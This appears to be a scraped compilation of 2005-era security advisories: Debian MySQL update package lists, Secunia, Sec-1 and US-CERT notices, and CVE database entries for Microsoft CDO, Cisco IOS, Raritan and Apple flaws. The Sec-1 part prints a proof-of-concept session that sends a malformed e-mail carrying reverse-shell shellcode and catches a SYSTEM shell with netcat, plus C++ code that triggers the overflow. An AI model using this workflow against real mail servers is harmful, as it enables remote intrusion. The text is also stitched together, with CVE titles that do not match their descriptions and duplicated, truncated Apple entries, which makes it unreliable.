http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-4.1_5.0.32-7etch5_arm.deb
Size/MD5 checksum: 47756 0145e1aa5ec02b5c60c2d78bbcd334a0
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.32-7etch5_arm.deb
Size/MD5 checksum: 25345622 2de813c86f1d10fb2df34d8b9de2336e
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.32-7etch5_arm.deb
Size/MD5 checksum: 6929754 8a6b3351769b567a468bc7dcb97a2141
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.32-7etch5_arm.deb
Size/MD5 checksum: 7204866 a8f69933d8081e753b76402e47e7a64a
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.32-7etch5_arm.deb
Size/MD5 checksum: 1747880 8da665b5f04444dcde03321f24ca8e4b
hppa architecture (HP PA RISC)
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.32-7etch5_hppa.deb
Size/MD5 checksum: 1920486 cb9a2e86902dc3f174926fbd8397a969
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.32-7etch5_hppa.deb
Size/MD5 checksum: 8046116 1eb6b1199a2c0f6a8502008a2c6df376
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.32-7etch5_hppa.deb
Size/MD5 checksum: 27055710 085b261bf2ec3820e21ec73bb59f6caa
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-4.1_5.0.32-7etch5_hppa.deb
Size/MD5 checksum: 47708 c17ca051ebe8783fa120c4596e32d9c2
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.32-7etch5_hppa.deb
Size/MD5 checksum: 8003914 59650ba346b2af0d77afbac64e93cca8
i386 architecture (Intel ia32)
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.32-7etch5_i386.deb
Size/MD5 checksum: 25370152 d615311235c5a9e6d85e7e77b4927d5d
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-4.1_5.0.32-7etch5_i386.deb
Size/MD5 checksum: 47746 1040540bc74e34b67d9606a4368162a7
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.32-7etch5_i386.deb
Size/MD5 checksum: 6971870 90aae8d289cb3df24009c65b1af3b12d
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.32-7etch5_i386.deb
Size/MD5 checksum: 7189880 6082aa213539a361cced40044161d108
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.32-7etch5_i386.deb
Size/MD5 checksum: 1793974 ab7cbdd14a9bff04066a865634ef1ce2
ia64 architecture (Intel ia64)
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.32-7etch5_ia64.deb
Size/MD5 checksum: 9736902 1e93082931f1055cd4c1436caa0020f3
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-4.1_5.0.32-7etch5_ia64.deb
Size/MD5 checksum: 47710 3369d882bf2b99a05397aaeddf8bf864
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.32-7etch5_ia64.deb
Size/MD5 checksum: 2115340 472e412113e7ae0bb76853cf0167cd57
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.32-7etch5_ia64.deb
Size/MD5 checksum: 30408810 8c8982aae5e90c451b08f22bc2a5399d
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.32-7etch5_ia64.deb
Size/MD5 checksum: 10341648 a5ef1b86109c465131ccfe5a9147bd74
mips architecture (MIPS (Big Endian))
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.32-7etch5_mips.deb
Size/MD5 checksum: 7655576 b92c42fbbd64a377fcc4277a1696ccdd
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.32-7etch5_mips.deb
Size/MD5 checksum: 1835994 2650808f606406336f55b31497bea015
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.32-7etch5_mips.deb
Size/MD5 checksum: 7749018 db3eb1fb41084f7cda145ecc1f808402
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-4.1_5.0.32-7etch5_mips.deb
Size/MD5 checksum: 47710 698fd659ef265c937dd045cfb2e9e28a
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.32-7etch5_mips.deb
Size/MD5 checksum: 26338840 89c569b544aeb60ce6aae1c77d40965e
mipsel architecture (MIPS (Little Endian))
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.32-7etch5_mipsel.deb
Size/MD5 checksum: 1789510 2501eed6aaa7143a89f13e4bd9658ecf
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-4.1_5.0.32-7etch5_mipsel.deb
Size/MD5 checksum: 47718 ed3dc0fc53b78b2307dc4790ff82a174
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.32-7etch5_mipsel.deb
Size/MD5 checksum: 7640356 5417137e8b9632964ea0d67e8cd96416
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.32-7etch5_mipsel.deb
Size/MD5 checksum: 25845474 d379d4a5f900202d6244858d379aa46a
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.32-7etch5_mipsel.deb
Size/MD5 checksum: 7561164 31fa1242af6a762a92486aa327469d1f
powerpc architecture (PowerPC)
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.32-7etch5_powerpc.deb
Size/MD5 checksum: 1832312 c6ab2b2c70aed56a7748eb0a5dd04c8c
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.32-7etch5_powerpc.deb
Size/MD5 checksum: 7573184 f43fb3a11284830b745346775073f92d
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.32-7etch5_powerpc.deb
Size/MD5 checksum: 7511850 184e9e37e760f4bb3779385d134975db
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-4.1_5.0.32-7etch5_powerpc.deb
Size/MD5 checksum: 47708 a76913df77b9f358f88a66875dc13a46
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.32-7etch5_powerpc.deb
Size/MD5 checksum: 26164462 386da660c381925416238a51b0a847a4
s390 architecture (IBM S/390)
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-4.1_5.0.32-7etch5_s390.deb
Size/MD5 checksum: 47714 7fa0b60bff0e106f6328b0b026566008
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.32-7etch5_s390.deb
Size/MD5 checksum: 26763646 544f49b13f6207c1a104dc9eef9e6dd9
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.32-7etch5_s390.deb
Size/MD5 checksum: 7413442 b70c6184c3b82ead175debdd569ab807
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.32-7etch5_s390.deb
Size/MD5 checksum: 7507380 f9cecc1ace4fd2455516986637490930
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.32-7etch5_s390.deb
Size/MD5 checksum: 1951732 d5eaad746a8db92889febd0da68f1ae5
sparc architecture (Sun SPARC/UltraSPARC)
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.32-7etch5_sparc.deb
Size/MD5 checksum: 7153228 566328488d67a3843b04689d76f0253d
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-4.1_5.0.32-7etch5_sparc.deb
Size/MD5 checksum: 47714 551a6f9a790b301d63c856ecab13be75
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.32-7etch5_sparc.deb
Size/MD5 checksum: 7013384 3915c6846d5ffce6e321b7e40006cb66
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.32-7etch5_sparc.deb
Size/MD5 checksum: 1797430 b0bd228090c8923d08c9b8ee84a1edb8
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.32-7etch5_sparc.deb
Size/MD5 checksum: 25425084 a9934459b8cde72354ffc463b2ec140f
These files will probably be moved into the stable distribution on
its next update.
- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
iD8DBQFHnjjKXm3vHE4uyloRApi/AKCLKlM616TTchb0zEQ8K4cOCdgZhwCffa1J
oQ57J3yhzeNDDwqXdxLvhxM=
=6ogr
-----END PGP SIGNATURE-----
VAR-200510-0005 | CVE-2005-1987 | Microsoft Internet Explorer can use any COM object |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
Buffer overflow in Collaboration Data Objects (CDO), as used in Microsoft Windows and Microsoft Exchange Server, allows remote attackers to execute arbitrary code when CDOSYS or CDOEX processes an e-mail message with a large header name, as demonstrated using the "Content-Type" string. The issue is due to a failure of the library to properly bounds-check user-supplied data before copying it into an insufficiently sized memory buffer, and it presents itself when an attacker sends a specially crafted e-mail message to a mail server that uses the affected library.

Microsoft Internet Explorer (IE) will attempt to instantiate COM objects that were not intended to be used in the web browser. This can have a variety of impacts, such as causing IE to crash. The Microsoft DDS Library Shape Control COM object contains an unspecified vulnerability, which may allow a remote attacker to execute arbitrary code on a vulnerable system.
----------------------------------------------------------------------
Are you interested in a new job in IT security?
Secunia has two open positions as Junior and Senior Specialist in IT
Security:
http://secunia.com/secunia_vacancies/
----------------------------------------------------------------------
TITLE:
Internet Explorer "javaprxy.dll" Memory Corruption Vulnerability
SECUNIA ADVISORY ID:
SA15891
VERIFY ADVISORY:
http://secunia.com/advisories/15891/
CRITICAL:
Highly critical
IMPACT:
DoS, System access
WHERE:
From remote
SOFTWARE:
Microsoft Internet Explorer 6.x
http://secunia.com/product/11/
Microsoft Internet Explorer 5.5
http://secunia.com/product/10/
Microsoft Internet Explorer 5.01
http://secunia.com/product/9/
DESCRIPTION:
SEC Consult has reported a vulnerability in Microsoft Internet
Explorer, which potentially can be exploited by malicious people to
compromise a user's system.
This can be exploited via a malicious web site to cause a memory
corruption.
The vulnerability has been reported in versions 5.01, 5.5, and 6.0.
SOLUTION:
The vendor recommends setting Internet and Local intranet security
zone settings to "High".
PROVIDED AND/OR DISCOVERED BY:
sk0L and Martin Eiszner, SEC Consult.
ORIGINAL ADVISORY:
Microsoft:
http://www.microsoft.com/technet/security/advisory/903144.mspx
SEC Consult:
http://www.sec-consult.com/184.html
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
SEC-1 LTD. The vulnerability exists when
event sinks are used within Microsoft Exchange 2000 or Microsoft Mail
services to parse e-mail content. Several Content Security packages
were identified to be vulnerable/exploitable.
The vulnerability can be exploited by crafting an e-mail with a large
header name such as "Content-Type<LARGE STRING>:".
A failure to correctly determine the length of the string results in a
stack overflow. Under certain conditions the vulnerability can also be
used to bypass content security mechanisms such as virus and content
security scanners. Proof of concept code to recreate the problem is
included at the bottom of this advisory.
Exploit Availability:
Sec-1 do not release exploit code to the general public.
Attendees of the Sec-1 Applied Hacking & Intrusion prevention course
will receive a copy of this exploit as part of the Sec-1 Exploit
Arsenal.
See: http://www.sec-1.com/applied_hacking_course.html
Exploit Example:
[root@homer PoC]# perl cdo.pl -f me@test.com -t me@test.com -h 10.0.0.53
Enter IP address of your attacking host: 10.0.0.200
Enter Port for shellcode to connect back on: 80
[*]----Connected OK!
[*]----Sending MAIL FROM: me@test.com
[*]----Sending RCPT TO: <me@test.com>
[*]----Sending Malformed E-mail body
[*]----Shellcode Length: 316
[*]----Shellcode type: Reverse shell
[*]----Done.
[!] Note this may take a while. Inetinfo will crash and restart
This will happen until a nops are reached. You may also want
to clear the queue to restore Inetinfo.exe by deleting malformed
e-mail from c:\Inetpub\mailroot\Queue
[root@homer PoC]# nc -l -p 80 -v
listening on [any] 80 ...
10.0.0.53: inverse host lookup failed: Unknown host
connect to [10.0.0.200] from (UNKNOWN) [10.0.0.53] 1100
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>c:\whoami
NT AUTHORITY\SYSTEM
C:\WINNT\system32>
Vendor Response:
Microsoft have released the following information including a fix,
http://www.microsoft.com/technet/security/bulletin/MS05-048.mspx
Common Vulnerabilities and Exposures (CVE) Information:
The Common Vulnerabilities and Exposures (CVE) project has assigned
the following names to these issues. These are candidates for
inclusion in the CVE list (http://cve.mitre.org), which standardizes
names for security problems.
CAN-2005-1987
Demonstration:
The following CDO code demonstrates the problem.
Step 1.
Create an E-mail named vuln.eml including a large "Content-Type:"
header.
Step 2.
// Compile with -GX option (C++ exception handling); Windows/MSVC only.
#include <windows.h>   // CoInitialize / CoUninitialize
#include <stdio.h>
#import <msado15.dll> no_namespace rename("EOF", "adoEOF")
#import <cdosys.dll> rename_namespace("CDO")

int main()
{
    CoInitialize(0);
    try
    {
        // Create a CDO Message object and load the vuln.eml from Step 1
        // into its underlying ADO stream
        CDO::IMessagePtr spMsg(__uuidof(CDO::Message));
        _StreamPtr spStream(spMsg->GetStream());
        spStream->Position = 0;
        spStream->Type = adTypeBinary;
        spStream->LoadFromFile("vuln.eml");
        spStream->Flush();
        // Reading the Content-Type mail header field of each body part is
        // what makes CDO parse the oversized header name and overflow
        for(long i = 1; i <= spMsg->BodyPart->BodyParts->Count; i++)
        {
            CDO::IBodyPartPtr spBdy = spMsg->BodyPart->BodyParts->Item[i];
            _variant_t v =
                spBdy->Fields->Item["urn:schemas:mailheader:Content-Type"]->Value;
        }
    }
    catch(_com_error &e)
    {
        printf("COM error[0x%X, %s]\n", e.Error(),
               (LPCTSTR)e.Description());
    }
    catch(...)
    {
        printf("General exception\n");
    }
    CoUninitialize();
    return 0;
}
Copyright 2005 Sec-1 LTD. All rights reserved.
Technical Cyber Security Alert TA05-284A
Microsoft Windows, Internet Explorer, and Exchange Server
Vulnerabilities
Original release date: October 11, 2005
Last revised: --
Source: US-CERT
Systems Affected
* Microsoft Windows
* Microsoft Internet Explorer
* Microsoft Exchange Server
For more complete information, refer to the Microsoft Security
Bulletin Summary for October 2005.
Overview
Microsoft has released updates that address critical vulnerabilities
in Windows, Internet Explorer, and Exchange Server.
I. Description
Microsoft Security Bulletins for October 2005 address vulnerabilities
in Windows and Internet Explorer. Further information is available in
the following US-CERT Vulnerability Notes:
VU#214572 - Microsoft Plug and Play fails to properly validate user
supplied data
Microsoft Plug and Play contains a flaw in the handling of message
buffers that may result in local or remote arbitrary code execution or
denial-of-service conditions.
(CAN-2005-1987)
VU#922708 - Microsoft Windows Shell fails to handle shortcut files
properly
Microsoft Windows Shell does not properly handle some shortcut files
and may permit arbitrary code execution when a specially-crafted file
is opened.
(CAN-2005-0163)
II. Impact
An attacker may also be able to cause a denial of service.
III. Solution
Apply Updates
Microsoft has provided the updates for these vulnerabilities in the
Security Bulletins and on the Microsoft Update site.
Workarounds
Please see the following US-CERT Vulnerability Notes for workarounds.
Appendix A. References
* Microsoft Security Bulletin Summary for October 2005 -
<http://www.microsoft.com/technet/security/bulletin/ms05-oct.mspx>
* US-CERT Vulnerability Note VU#214572 -
<http://www.kb.cert.org/vuls/id/214572>
* US-CERT Vulnerability Note VU#883460 -
<http://www.kb.cert.org/vuls/id/883460>
* US-CERT Vulnerability Note VU#922708 -
<http://www.kb.cert.org/vuls/id/922708>
* US-CERT Vulnerability Note VU#995220 -
<http://www.kb.cert.org/vuls/id/995220>
* US-CERT Vulnerability Note VU#180868 -
<http://www.kb.cert.org/vuls/id/180868>
* US-CERT Vulnerability Note VU#950516 -
<http://www.kb.cert.org/vuls/id/950516>
* US-CERT Vulnerability Note VU#959049 -
<http://www.kb.cert.org/vuls/id/959049>
* US-CERT Vulnerability Note VU#680526 -
<http://www.kb.cert.org/vuls/id/680526>
* CAN-2005-2120 -
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2120>
* CAN-2005-1987 -
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1987>
* CAN-2005-2122 -
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2122>
* CAN-2005-2128 -
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2128>
* CAN-2005-2119 -
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2119>
* CAN-2005-1978 -
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1978>
* CAN-2005-2127 -
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2127>
* CAN-2005-0163 -
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0163>
* Microsoft Update - <https://update.microsoft.com/microsoftupdate>
_________________________________________________________________
The most recent version of this document can be found at:
<http://www.us-cert.gov/cas/techalerts/TA05-284A.html>
_________________________________________________________________
Feedback can be directed to US-CERT. Please send email to:
<cert@cert.org> with "TA05-284A Feedback VU#959049" in the subject.
_________________________________________________________________
Revision History
Oct 11, 2004: Initial release
_________________________________________________________________
Produced 2005 by US-CERT, a government organization.
Terms of use
<http://www.us-cert.gov/legal.html>
_________________________________________________________________
For instructions on subscribing to or unsubscribing from this
mailing list, visit <http://www.us-cert.gov/cas/>.
VAR-200507-0107 | CVE-2005-2105 | Cisco IOS of AAA Avoiding authentication in authentication services Vulnerabilities |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
Cisco IOS 12.2T through 12.4 allows remote attackers to bypass Authentication, Authorization, and Accounting (AAA) RADIUS authentication, if the fallback method is set to none, via a long username.
A remote attacker may exploit this issue to bypass authentication and gain unauthorized access to the affected service. Cisco IOS is the underlying system used by Cisco devices.
VAR-200507-0043 | CVE-2005-2136 | Raritan DominionSX ConsoleServer Weak security mechanism vulnerability |
CVSS V2: 4.6 CVSS V3: - Severity: MEDIUM |
Raritan Dominion SX (DSX) Console Servers DSX16, DSX32, DSX4, DSX8, and DSXA-48 set (1) world-readable permissions for /etc/shadow and (2) world-writable permissions for /bin/busybox, which allows local users to obtain hashed passwords or execute arbitrary code as other users. Raritan Dominion SX is reportedly prone to multiple vulnerabilities.
Reportedly, the server contains two default accounts that are not protected with a password. This can allow a remote attacker to gain unauthorized access to the server.
Another issue can allow an attacker to potentially gain elevated privileges on an affected computer as the shadow password file is world readable.
Raritan Dominion SX16, SX32, SX4, SX8, and SXA-48 are reportedly vulnerable. The researcher responsible for reporting these issues has stated that DSX32 running firmware version 2.4.6 was tested and is vulnerable to these issues.
This BID will be updated when more details are available. Raritan Dominion SX Console Server is a set of serial device management software. Raritan Dominion SX (DSX) Console Servers DSX16, DSX32, DSX4, DSX8, and DSXA-48 have weak security mechanisms.
TITLE:
Dominion SX Insecure File Permission Security Issues
SECUNIA ADVISORY ID:
SA15853
VERIFY ADVISORY:
http://secunia.com/advisories/15853/
CRITICAL:
Less critical
IMPACT:
Manipulation of data, Exposure of sensitive information
WHERE:
Local system
OPERATING SYSTEM:
Dominion SX
http://secunia.com/product/5300/
DESCRIPTION:
Dirk Wetter has reported two security issues in Dominion SX, which
can be exploited by malicious, local users to disclose sensitive
information, cause a DoS (Denial of Service), and potentially gain
escalated privileges.
1) The default file permission of "/etc/shadow" is set to
world-readable, which makes it possible to gain knowledge of the root
user's password hash.
2) The default file permission of "/bin/busybox" is set to
world-writable. This can be exploited to move or delete the file and
potentially execute arbitrary code with another user's privileges by
replacing it with a malicious file.
The security issues have been reported in DSX4, DSX8, DSX16, DSX32,
and DSXA-48.
SOLUTION:
Apply updated firmware.
http://www.raritan.com/support/sup_upgrades.aspx
PROVIDED AND/OR DISCOVERED BY:
Dirk Wetter
----------------------------------------------------------------------
VAR-200510-0293 | CVE-2005-2524 | Ruby library contains vulnerable default value |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Safari after 2.0 in Apple Mac OS X 10.3.9 allows remote attackers to bypass domain restrictions via crafted web archives that cause Safari to render them as if they came from a different site. Ruby includes a vulnerable default value that may be used to bypass security restrictions and execute arbitrary code. Apple Mac OS X QuickDraw Manager contains a buffer overflow that may allow a remote attacker to execute arbitrary code.
Two vulnerabilities in Mail resulting in information disclosure.
A local privilege escalation vulnerability in malloc. This issue has been split into BID 14939.
An arbitrary code execution vulnerability in QuickDraw Manager.
A privilege escalation vulnerability in QuickTime for Java.
A cross-site scripting vulnerability in Safari.
An unauthorized access vulnerability in SecurityAgent.
A privilege escalation vulnerability in securityd. Safari is Apple's Safari web browser compatible with Microsoft Windows operating system.
1) A boundary error in ImageIO can be exploited to cause a buffer
overflow and may allow execution of arbitrary code on a user's system
when a specially crafted GIF file is opened e.g. in WebCore or
Safari.
2) An error in Mail.app when processing auto-reply rules can cause an
automatically generated response message to include a plain-text copy
of the encrypted message. This may disclose certain sensitive
information.
3) An error in Mail.app when using Kerberos 5 for SMTP authentication
can cause un-initialized memory to be appended to a message. This may
disclose certain sensitive information.
For more information:
SA16449
4) "malloc" creates diagnostic files insecurely when certain
environmental variables are set to enable debugging of application
memory allocation. This can be exploited by malicious, local users to
create or overwrite arbitrary files. from Safari,
Mail, or Finder.
6) A validation error in the Java extensions bundled with QuickTime
6.52 and earlier can be exploited by untrusted applets to call
arbitrary functions from system libraries. Systems with QuickTime 7
or later, or Mac OS X v10.4 or later, are not affected. Systems prior to Mac OS X v10.4
are not affected.
For more information:
SA15767
8) A validation error in Safari when rendering web archives from a
malicious site can be exploited to execute arbitrary HTML and script
code in a user's browser session in the context of another site.
For more information:
SA16449
9) An error in the SecurityAgent may cause the "Switch User..."
button to be displayed even when the "Enable fast user switching"
setting has been disabled. This may allow malicious, local users to
access the current user's desktop without authentication even when
the "Require password to wake this computer from sleep or screen
saver" setting is enabled.
10) A validation error in the Authorization Services "securityd"
allows unprivileged users to gain certain privileges that should be
restricted to administrative users. This can be exploited by
malicious, local users to gain escalated privileges.
SOLUTION:
Apply Security Update 2005-008.
Mac OS X 10.3.9:
http://www.apple.com/support/downloads/securityupdate2005008macosx1039.html
Mac OS X 10.4.2:
http://www.apple.com/support/downloads/securityupdate2005008macosx1042.html
PROVIDED AND/OR DISCOVERED BY:
2) Norbert Rittel, Rittel Consulting
3) MIT Kerberos Team
4) Ilja van Sprundel, Suresec LTD
5) Henrik Dalgaard, Echo One
6) Dino Dai Zovi
9) Luke Fowler, Indiana University Global Research Network Operations
Center
ORIGINAL ADVISORY:
Apple:
http://docs.info.apple.com/article.html?artnum=302413
OTHER REFERENCES:
SA15767:
http://secunia.com/advisories/15767/
SA16449:
http://secunia.com/advisories/16449/
The vulnerability is caused due to an unspecified error in the XMLRPC
module, which may be exploited to execute arbitrary commands on a
vulnerable XMLRPC server.
The vulnerability has been reported in version 1.8.2. Prior versions
may also be affected.
SOLUTION:
The vulnerability has been fixed in the CVS repository.
VAR-200510-0138 | CVE-2005-2743 | Ruby library contains vulnerable default value |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
The Java extensions for QuickTime 6.52 and earlier in Apple Mac OS X 10.3.9 allow untrusted applets to call arbitrary functions in system libraries, which allows remote attackers to execute arbitrary code. Ruby includes a vulnerable default value that may be used to bypass security restrictions and execute arbitrary code.
Two vulnerabilities in Mail resulting in information disclosure.
A local privilege escalation vulnerability in malloc. This issue has been split into BID 14939.
An arbitrary code execution vulnerability in QuickDraw Manager.
A privilege escalation vulnerability in QuickTime for Java.
A cross-site scripting vulnerability in Safari.
An unauthorized access vulnerability in SecurityAgent.
A privilege escalation vulnerability in securityd. Mac OS is an operating system running on Apple Macintosh series computers.
1) A boundary error in ImageIO can be exploited to cause a buffer
overflow and may allow execution of arbitrary code on a user's system
when a specially crafted GIF file is opened e.g. in WebCore or
Safari.
2) An error in Mail.app when processing auto-reply rules can cause an
automatically generated response message to include a plain-text copy
of the encrypted message. This may disclose certain sensitive
information.
3) An error in Mail.app when using Kerberos 5 for SMTP authentication
can cause un-initialized memory to be appended to a message. This may
disclose certain sensitive information.
For more information:
SA16449
4) "malloc" creates diagnostic files insecurely when certain
environmental variables are set to enable debugging of application
memory allocation. This can be exploited by malicious, local users to
create or overwrite arbitrary files. from Safari,
Mail, or Finder. Systems with QuickTime 7
or later, or Mac OS X v10.4 or later, are not affected. Systems prior to Mac OS X v10.4
are not affected.
For more information:
SA15767
8) A validation error in Safari when rendering web archives from a
malicious site can be exploited to execute arbitrary HTML and script
code in a user's browser session in the context of another site.
For more information:
SA16449
9) An error in the SecurityAgent may cause the "Switch User..."
button to be displayed even when the "Enable fast user switching"
setting has been disabled. This may allow malicious, local users to
access the current user's desktop without authentication even when
the "Require password to wake this computer from sleep or screen
saver" setting is enabled.
10) A validation error in the Authorization Services "securityd"
allows unprivileged users to gain certain privileges that should be
restricted to administrative users. This can be exploited by
malicious, local users to gain escalated privileges.
SOLUTION:
Apply Security Update 2005-008.
Mac OS X 10.3.9:
http://www.apple.com/support/downloads/securityupdate2005008macosx1039.html
Mac OS X 10.4.2:
http://www.apple.com/support/downloads/securityupdate2005008macosx1042.html
PROVIDED AND/OR DISCOVERED BY:
2) Norbert Rittel, Rittel Consulting
3) MIT Kerberos Team
4) Ilja van Sprundel, Suresec LTD
5) Henrik Dalgaard, Echo One
6) Dino Dai Zovi
9) Luke Fowler, Indiana University Global Research Network Operations
Center
ORIGINAL ADVISORY:
Apple:
http://docs.info.apple.com/article.html?artnum=302413
OTHER REFERENCES:
SA15767:
http://secunia.com/advisories/15767/
SA16449:
http://secunia.com/advisories/16449/
The vulnerability is caused due to an unspecified error in the XMLRPC
module, which may be exploited to execute arbitrary commands on a
vulnerable XMLRPC server.
The vulnerability has been reported in version 1.8.2. Prior versions
may also be affected.
SOLUTION:
The vulnerability has been fixed in the CVS repository.
VAR-200510-0142 | CVE-2005-2747 | Ruby library contains vulnerable default value |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
Buffer overflow in ImageIO for Apple Mac OS X 10.4.2, as used by applications such as WebCore and Safari, allows remote attackers to execute arbitrary code via a crafted GIF file. Ruby includes a vulnerable default value that may be used to bypass security restrictions and execute arbitrary code.
Two vulnerabilities in Mail resulting in information disclosure.
A local privilege escalation vulnerability in malloc. This issue has been split into BID 14939.
An arbitrary code execution vulnerability in QuickDraw Manager.
A privilege escalation vulnerability in QuickTime for Java.
A cross-site scripting vulnerability in Safari.
An unauthorized access vulnerability in SecurityAgent.
A privilege escalation vulnerability in securityd. in WebCore or
Safari.
2) An error in Mail.app when processing auto-reply rules can cause an
automatically generated response message to include a plain-text copy
of the encrypted message. This may disclose certain sensitive
information.
3) An error in Mail.app when using Kerberos 5 for SMTP authentication
can cause un-initialized memory to be appended to a message. This may
disclose certain sensitive information.
For more information:
SA16449
4) "malloc" creates diagnostic files insecurely when certain
environmental variables are set to enable debugging of application
memory allocation. This can be exploited by malicious, local users to
create or overwrite arbitrary files. from Safari,
Mail, or Finder.
6) A validation error in the Java extensions bundled with QuickTime
6.52 and earlier can be exploited by untrusted applets to call
arbitrary functions from system libraries. Systems with QuickTime 7
or later, or Mac OS X v10.4 or later, are not affected. Systems prior to Mac OS X v10.4
are not affected.
For more information:
SA15767
8) A validation error in Safari when rendering web archives from a
malicious site can be exploited to execute arbitrary HTML and script
code in a user's browser session in the context of another site.
For more information:
SA16449
9) An error in the SecurityAgent may cause the "Switch User..."
button to be displayed even when the "Enable fast user switching"
setting has been disabled. This may allow malicious, local users to
access the current user's desktop without authentication even when
the "Require password to wake this computer from sleep or screen
saver" setting is enabled.
10) A validation error in the Authorization Services "securityd"
allows unprivileged users to gain certain privileges that should be
restricted to administrative users. This can be exploited by
malicious, local users to gain escalated privileges.
SOLUTION:
Apply Security Update 2005-008.
Mac OS X 10.3.9:
http://www.apple.com/support/downloads/securityupdate2005008macosx1039.html
Mac OS X 10.4.2:
http://www.apple.com/support/downloads/securityupdate2005008macosx1042.html
PROVIDED AND/OR DISCOVERED BY:
2) Norbert Rittel, Rittel Consulting
3) MIT Kerberos Team
4) Ilja van Sprundel, Suresec LTD
5) Henrik Dalgaard, Echo One
6) Dino Dai Zovi
9) Luke Fowler, Indiana University Global Research Network Operations
Center
ORIGINAL ADVISORY:
Apple:
http://docs.info.apple.com/article.html?artnum=302413
OTHER REFERENCES:
SA15767:
